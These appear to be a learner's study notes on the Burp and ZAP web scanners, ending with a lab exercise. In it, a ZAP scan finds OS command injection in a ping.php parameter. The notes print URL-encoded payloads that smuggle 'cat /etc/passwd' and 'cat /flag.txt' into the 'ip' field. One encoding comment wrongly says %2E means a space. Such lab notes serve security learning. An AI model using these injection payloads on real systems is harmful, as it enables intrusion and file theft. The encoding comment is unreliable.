8 - Web Scanners - JA Smith

# Burp Scanner - `Burp Scanner` is a a powerful scanner for various types of web vulnerabilities, using a `Crawler` for building the website structure, and `Scanner` for passive and active scanning - However, this is a paid only tool - Options for starting a scan: - Start a scan on a specific request from `Proxy History` - Start a new scan on a set of one or more targets - Start a scan on items in scope - Once the scope is set, we can go to `Dashboard` and click on `New Scan` to configure our scan - We are given two options: `Crawl & Audit` and `Crawl` - We can also set a crawl strategy - For both options, the `Crawler` navigates a website by accessing any links found in its pages, accessing any forms, and examining any requests it makes to build a comprehensive map of the website. In the end, Burp Scanner presents us with a map of the target, showing all publicly accessible data in a single place - Once the scans are complete, we can generate an HTML or XML report # ZAP Scanner - `ZAP Scanner` is capable of building site maps using `ZAP Spider` and performing both passive and active scans to look for various types of vulnerabilities ![[images/Pasted image 20251114181852.png]] - `ZAP Spider` - Builds a site map ![[images/Pasted image 20251114182417.png]] - To start a Spider scan on any website, we can locate a request from our History tab and select (`Attack>Spider`) from the right-click menu - Another option is to use the HUD in the pre-configured browser ![[images/Pasted image 20251114182434.png]] - The left side shows page specific info and the right side shows info for the overall site - Passive Scanner - Automatically runs on each response while `ZAP Spider` runs - Identifies potential issues and vulns - Active Scanner - Tries various attacks against all identified pages in the site map and HTTP parameters to identify vulns - Can generate an HTML, XML, or md report ![[images/Pasted image 20251114183448.png]] # Exercise - Run a spider scan to build as site map - Run an active scan - Let this cook - We a high-level vuln re: remote OS command injection ![[images/Pasted image 20251114182856.png]] - The scan ran the below test using the command `cat /etc/passwd` ![[images/Pasted image 20251114183204.png]] ``` http://94.237.58.116:33439/devtools/ping.php?ip=127.0.0.1%26cat+%2Fetc%2Fpasswd%26 ``` - We will have to change this to `cat /flag.txt` with the proper URL encoding ``` http://94.237.58.116:33439/devtools/ping.php?ip=127.0.0.1%26cat+%2Fflag%2Etxt%26 # %2F = / # %2E = '[space]' # %26 = & ``` - After editing the request as above, we can replay in console and view the response ![[images/Pasted image 20251114183204.png]]